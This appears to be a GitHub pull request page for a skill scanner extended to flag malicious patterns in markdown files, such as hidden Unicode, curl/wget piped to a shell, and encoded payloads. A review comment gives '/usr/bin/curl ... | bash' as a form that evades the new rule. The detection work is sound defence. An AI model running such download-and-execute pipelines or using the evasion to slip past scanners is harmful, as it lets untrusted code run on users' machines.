The reason will be displayed to describe this comment to others. Learn more.

P2 Badge Accept absolute-path downloaders in markdown pipeline detection

The download segment check requires the pipeline's first command token to begin exactly with curl or wget, so equivalent forms like /usr/bin/curl ... | bash or /bin/wget ... | sh are missed. Those commands still download and immediately execute payloads, so this creates a straightforward evasion path for the new critical markdown rule.

Useful? React with 👍 / 👎.

Alex-Alaniz and others added 2 commits May 5, 2026 09:57
…finitions

The skill scanner previously only analyzed JS/TS files for malicious patterns,
leaving SKILL.md files completely unscanned. This extends coverage to markdown
files with rules targeting embedded technical threats:

- Hidden Unicode (zero-width, bidi overrides) used to conceal malicious content
- Download-and-execute patterns (curl|wget piped to shell)
- Large base64 payloads in code fences (obfuscated content)
- Hex-encoded payloads in markdown body
- Data URIs with executable MIME types

Code rules and markdown rules are applied independently — code patterns
(eval, child_process) do not false-positive on markdown documentation,
and markdown rules do not fire on JS/TS files.

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
@clawsweeper

clawsweeper Bot commented May 20, 2026

Copy link
Copy Markdown
Contributor

ClawSweeper PR egg

🔥 Warming up: real-behavior proof passed; findings, security review, or rank-up moves are still in progress.

Hatch command

Comment @clawsweeper hatch when this PR is hatchable.

Hatchability rules:

  • Merged PRs are hatchable.
  • Open PRs are hatchable when they are status: 👀 ready for maintainer look, status: 🚀 automerge armed, or labeled clawsweeper:automerge.
  • Closed unmerged PRs are hatchable only when one of those hatchable labels is still present in the durable record.
What is this egg doing here?
  • Eggs appear after the PR passes real-behavior proof. It is here for vibes, not verdicts: it does not change labels, ratings, merge decisions, or automation.
  • The shell reacts to review momentum: open follow-up work warms it up, re-review makes it wobble, and a clean final review lets it hatch.
  • Hatchability usually comes from sufficient real-behavior proof, no blocking P0/P1/P2 findings, no security attention needed, and clean correctness. A merged PR is already final, so merge makes the egg hatchable independently.
  • The hatch is seeded from this repository and PR number, so the same PR keeps the same creature; the reviewed head SHA can only change safe visual details.
  • Rarity is just collectible sparkle: 🥚 common, 🌱 uncommon, 💎 rare, ✨ glimmer, and 🌈 legendary.

@clawsweeper clawsweeper Bot added rating: 🧂 unranked krab Not merge-ready due to missing proof or serious correctness/safety concerns. and removed rating: 🦪 silver shellfish Thin PR readiness signal; proof, validation, or implementation needs work. labels May 20, 2026
@jesse-merhi jesse-merhi added security Security documentation and removed security Security documentation labels May 25, 2026
@openclaw-barnacle

Copy link
Copy Markdown

This pull request has been automatically marked as stale due to inactivity.
Please add updates or it will be closed.

@openclaw-barnacle openclaw-barnacle Bot added the stale Marked as stale due to inactivity label Jun 8, 2026
@clawsweeper clawsweeper Bot added rating: 🌊 off-meta tidepool PR readiness rating does not apply to this item. and removed proof: sufficient ClawSweeper judged the real behavior proof convincing. rating: 🧂 unranked krab Not merge-ready due to missing proof or serious correctness/safety concerns. status: ⏳ waiting on author ClawSweeper has contributor-facing work open and is waiting for author action. labels Jun 8, 2026
@openclaw-barnacle openclaw-barnacle Bot removed the stale Marked as stale due to inactivity label Jun 9, 2026
@clawsweeper clawsweeper Bot added proof: sufficient ClawSweeper judged the real behavior proof convincing. rating: 🧂 unranked krab Not merge-ready due to missing proof or serious correctness/safety concerns. status: ⏳ waiting on author ClawSweeper has contributor-facing work open and is waiting for author action. rating: 🦐 gold shrimp Decent PR readiness signal, but merge confidence is limited. rating: 🦪 silver shellfish Thin PR readiness signal; proof, validation, or implementation needs work. rating: 🌊 off-meta tidepool PR readiness rating does not apply to this item. and removed rating: 🌊 off-meta tidepool PR readiness rating does not apply to this item. rating: 🧂 unranked krab Not merge-ready due to missing proof or serious correctness/safety concerns. rating: 🦐 gold shrimp Decent PR readiness signal, but merge confidence is limited. proof: sufficient ClawSweeper judged the real behavior proof convincing. rating: 🦪 silver shellfish Thin PR readiness signal; proof, validation, or implementation needs work. status: ⏳ waiting on author ClawSweeper has contributor-facing work open and is waiting for author action. labels Jun 9, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

merge-risk: 🚨 compatibility 🚨 May break existing users, config, migrations, defaults, or upgrade paths. merge-risk: 🚨 security-boundary 🚨 May affect sandboxing, authorization, credentials, or sensitive data. P2 Normal backlog priority with limited blast radius. proof: sufficient ClawSweeper judged the real behavior proof convincing. proof: supplied External PR includes structured after-fix real behavior proof. rating: 🧂 unranked krab Not merge-ready due to missing proof or serious correctness/safety concerns. size: L status: ⏳ waiting on author ClawSweeper has contributor-facing work open and is waiting for author action.

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants